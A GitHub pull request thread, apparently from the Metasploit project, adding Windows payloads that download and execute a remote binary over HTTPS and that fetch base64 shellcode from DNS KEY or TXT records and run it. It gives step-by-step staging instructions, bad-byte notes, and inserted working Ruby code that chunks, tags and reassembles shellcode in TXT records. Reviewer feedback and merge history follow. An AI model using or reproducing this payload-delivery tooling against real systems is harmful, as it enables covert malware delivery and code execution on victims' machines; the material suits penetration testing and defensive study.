Added 3 new payloads #173

Closed
wants to merge 19 commits into
from


@corelanc0d3r
Contributor

Payload 1 : download_exec_https.rb
This payload allows you to download a binary (I don't think it needs to have an .exe extension) from a web server. (You need to host the binary and the web server yourself.)
The payload will download the file over HTTPS, using the IE proxy settings, drop the file on the target system (you can choose the filename) and run it.

Payload 2 : dns_query_exec.rb
This payload allows you to read & execute shellcode from the reply for a KEY DNS record.
In order to make this work, you need the following things

  1. Register a public DNS zone & make sure you can create KEY (not DNSSEC) records. Alternatively, register a DNS zone, make the NS record point to your public IP & host your own DNS server
  2. Create the shellcode you want to execute. Write the shellcode to a file and base64 encode it.
  3. Create a KEY DNS record and paste in the base64 encoded shellcode as key
  4. Generate the dns_query_exec payload, using the FQDN of the newly created KEY record and use that in your exploit

Upon execution of the dns_query_exec payload, a DNS query will be performed. The corporate DNS server, or online DNS servers should be more than happy to get the KEY for you so you can read it & execute it.
Or, in other words, this allows you to retrieve bigger payload from a remote system without connecting to it :)

Payload 3 : dns_txt_query_exec.rb

This one will retrieve all TXT records for a given domain, retrieve individual shellcode parts (based on tags that contain a sequence) from the TXT records, put them in the correct order, and execute them.

If you want to test, I have set up the domain corelan.eu with a payload (a simple message box, in 3 TXT records).
Usage instructions are inside the payload module

@corelanc0d3r
Contributor

Regarding the DNS KEY query: I noticed that, on Windows 7, the shellcode you want to deliver should exclude \x00, \x0a and \x0d (before the base64 action). (Just a convention, I guess.)

Other than that, delivering a meterpreter via the DNS key record works fine on XP SP3 with DEP on, and win7 wow64 (with DEP AlwaysOn, and Avast running)
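As an added example (not code from this pull request or from Metasploit), the following Ruby shows the hosting side of the TXT and KEY delivery described in the PR description, plus the bad-byte check from the Windows 7 note above, and the reassembly logic a client needs: records come back from the resolver in arbitrary order, so each part must carry a sequence tag, and all parts must be present before decoding. The tag layout `seq/total:data`, the 200-character chunk size (a DNS TXT character-string is limited to 255 bytes, so the tag must fit in the remainder) and the `\x90...` sample bytes are assumptions made for this example; the real module's tag format is not shown on this page. For the KEY record variant, the unchunked base64 string from the same encoding step is what goes into the record.

```ruby
require 'base64'

# Bytes the PR discussion reports as unusable in raw shellcode delivered via
# the KEY record on Windows 7 (checked before base64 encoding).
BAD_BYTES = ["\x00", "\x0a", "\x0d"].map(&:b).freeze

# Payload size per TXT record. Assumption for this example: a TXT
# character-string holds at most 255 bytes, so leave room for the "seq/total:" tag.
CHUNK = 200

# Return the bad bytes present in the shellcode (empty array when clean).
def bad_bytes(shellcode)
  BAD_BYTES.select { |b| shellcode.b.include?(b) }
end

# Base64 the shellcode and split it into tagged TXT record strings.
# Tag format "seq/total:data" is an assumption for this example.
def build_txt_records(shellcode)
  bad = bad_bytes(shellcode)
  unless bad.empty?
    raise ArgumentError, "shellcode contains bad bytes: #{bad.map { |b| '\x%02x' % b.ord }.join(' ')}"
  end
  b64 = Base64.strict_encode64(shellcode)
  parts = b64.scan(/.{1,#{CHUNK}}/)
  parts.each_with_index.map { |p, i| format('%d/%d:%s', i + 1, parts.size, p) }
end

# Client side: take the TXT strings in whatever order the resolver returned
# them, validate the sequence tags, order the parts and decode.
# Raises when a part is missing or duplicated, which is the failure mode
# to look for when a target only fetches the first record.
def reassemble_txt_records(records)
  parsed = records.map do |r|
    m = r.match(%r{\A(\d+)/(\d+):([A-Za-z0-9+/=]+)\z}) or
      raise ArgumentError, "unrecognised TXT record: #{r.inspect}"
    [m[1].to_i, m[2].to_i, m[3]]
  end
  totals = parsed.map { |_, t, _| t }.uniq
  raise ArgumentError, "inconsistent totals: #{totals.inspect}" unless totals.size == 1
  total = totals.first
  seqs = parsed.map(&:first)
  raise ArgumentError, "duplicate parts: #{seqs.inspect}" unless seqs.uniq.size == seqs.size
  missing = (1..total).to_a - seqs
  raise ArgumentError, "missing parts: #{missing.inspect}" unless missing.empty?
  Base64.strict_decode64(parsed.sort_by(&:first).map(&:last).join)
end

if $PROGRAM_NAME == __FILE__
  # Constructed stand-in for shellcode: a NOP sled ending in INT3, no bad bytes.
  sample = ("\x90" * 500 + "\xcc").b
  records = build_txt_records(sample)
  puts "#{records.size} TXT records, e.g. #{records.first[0, 40]}..."
  puts "roundtrip ok: #{reassemble_txt_records(records.shuffle) == sample}"
  begin
    reassemble_txt_records(records.first(1))
  rescue ArgumentError => e
    puts "only first record fetched: #{e.message}"
  end
end
```

When hosting the records yourself, keep each TXT string under the 255-byte character-string limit and make sure the resolver actually returns the full record set; the reassembly check above is what turns a partial answer into a clear error instead of a crash in the decoded bytes.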

@wchen-r7
Contributor

So after discussing with egyp7 and hdm, we have concluded that (for the HTTPS download module):

  • It is best to use one option (datastore['URI']) instead of multiple ('URI', 'RHOST', 'RPORT'). You can pass just 'URI', and then break it down in ruby.
  • It needs a configurable EXITFUNC
  • It needs a title more similar to windows/download_exec.
  • It should probably reject non HTTPS URLs, because the module is hardcoded to do HTTPS.
@wchen-r7
Contributor

Another comment from HD: It is doing an 8MB allocation in order to write to the disk. It really should be reading from the internet handle and writing to the file in one go. That way it doesn't even need VirtualAlloc, etc.

@wchen-r7
Contributor

Lastly, there are two calls to ExitProcess, should be combined.

Let me close this pull request for now. When it's fixed I'll reopen again (or let me know in case I'm not paying attention). Thanks.

@wchen-r7 wchen-r7 closed this Feb 14, 2012
@corelanc0d3r
Contributor

please reopen so I can submit changes :

  • implemented exitfunc support (and removed the hardcoded exitprocess call from original meterpreter code)
  • changed title & description
  • moved target into a single URL parameter (don't care about protocol, always uses https)

I'll work on the last requirement too (writing directly to file)
tx

@corelanc0d3r
Contributor

just to be sure about the virtualalloc vs write to file directly :

  • virtualalloc increases process memory
  • write directly to file requires some space on the stack, and some code to set this up.

Total length of payload may not be a lot smaller when writing directly to file, and because of stackadjust, we may hit top of stack (unlikely, but you never know)

I'll write it the way you think is best, I just want to make sure I understand why you prefer one over the other

tx

@todb-r7 todb-r7 reopened this Feb 14, 2012
@corelanc0d3r
Contributor

I think we will be able to replace the existing download_exec file with this new version, which supports http, https and ftp (it decides which protocol to use based on what the user provided in the URL parameter).
I tested https and http, didn't test ftp yet... but wanted to commit before I leave on travel
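The review above asked for a single URI option that is broken down in Ruby and for non-HTTPS URLs to be rejected, and the comment just above describes the later version picking http, https or ftp from the URL. As an added example (not the module's own code), this helper shows how such an option can be validated and split; the scheme defaults, the `https_only` switch and the example.com URLs are assumptions made for this example.

```ruby
require 'uri'

# Schemes the download stub could speak and their default ports.
SUPPORTED_SCHEMES = { 'http' => 80, 'https' => 443, 'ftp' => 21 }.freeze

# Break a single URL option into the pieces a download stub needs.
# https_only: true reproduces the earlier review request (HTTPS-only module);
# false reproduces the later behaviour of choosing the protocol from the URL.
def parse_download_url(url, https_only: false)
  uri = URI.parse(url.to_s.strip)
  scheme = uri.scheme.to_s.downcase
  unless SUPPORTED_SCHEMES.key?(scheme)
    raise ArgumentError, "unsupported scheme #{scheme.inspect}; expected #{SUPPORTED_SCHEMES.keys.join('/')}"
  end
  raise ArgumentError, 'only https:// URLs are accepted' if https_only && scheme != 'https'
  raise ArgumentError, 'URL has no host' if uri.host.nil? || uri.host.empty?

  # URI::FTP strips the leading slash from the path, so normalise it back.
  path = uri.path.to_s
  path = '/' + path unless path.start_with?('/')
  path += "?#{uri.query}" if uri.query

  {
    scheme: scheme,
    host: uri.host,
    port: uri.port || SUPPORTED_SCHEMES[scheme],
    path: path,
    ssl: scheme == 'https'
  }
rescue URI::InvalidURIError => e
  raise ArgumentError, "invalid URL: #{e.message}"
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample URLs.
  ['https://example.com/payload.bin',
   'http://example.com:8080/p?x=1',
   'ftp://example.com/dir/p.bin',
   'file:///etc/passwd'].each do |u|
    begin
      puts "#{u} -> #{parse_download_url(u).inspect}"
    rescue ArgumentError => e
      puts "#{u} -> rejected: #{e.message}"
    end
  end
end
```

Rejecting unknown schemes up front matters because the stub on the target hardcodes which API path it uses; a URL the Ruby side cannot classify would otherwise be handed to the target and fail there without a useful error.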

@todb-r7
Contributor
todb-r7 commented Mar 19, 2012

Tested the http and the DNS txt payloads, the http one works like a champ, the DNS one, not so much -- the target only seems to query the first part of the 3 part payload (target was win2k3 sp

I'm going to snag the http payload directly and just commit that one to close the pull request -- can you take a look at the two DNS payloads and see what's up with that? Target is win2k3 sp2, I have a pcap here:

http://www.pcapr.net/view/todb/2012/2/1/13/1.pcap.html

@todb-r7 todb-r7 pushed a commit that closed this pull request Mar 19, 2012
@corelanc0d3r @todb corelanc0d3r + todb Adding corelanc0d3r's http/https/ftp payload
Picks up the one http/https/ftp payload, but not the other two DNS
payloads listed as part of the original pull request.

[Closes #173]
a3035dc
@todb-r7 todb-r7 closed this in a3035dc Mar 19, 2012
@todb-r7
Contributor
todb-r7 commented Mar 19, 2012

If you can confirm that the dns stuff works, please reopen the pull request

@corelanc0d3r
Contributor

I know what the issue is - I'll rewrite the module entirely (and work with ChrisJohnRiley to see if we can also build a DNS server payload hoster that would be compatible with the payload)... I'll open a new/separate pull request when I'm done

@corelanc0d3r
Contributor

check your mail

@ffr4nz
ffr4nz commented Apr 11, 2012

Great job.
We presented a malware distribution method using 3rd-party cache DNS last year at RootedCON. Maybe you can use it in your payload...
2011 Malware distribution: http://www.slideshare.net/rootedcon/francisco-jess-gmez-carlos-juan-diaz-cloud-malware-distribution-dns-will-be-your-friend-rootedcon-2011
2012 Data leak: http://www.slideshare.net/ffranz/rootedcon2012-dns-a-botnet-dialect-carlos-diaz-francisco-j-gomez

Cheers!
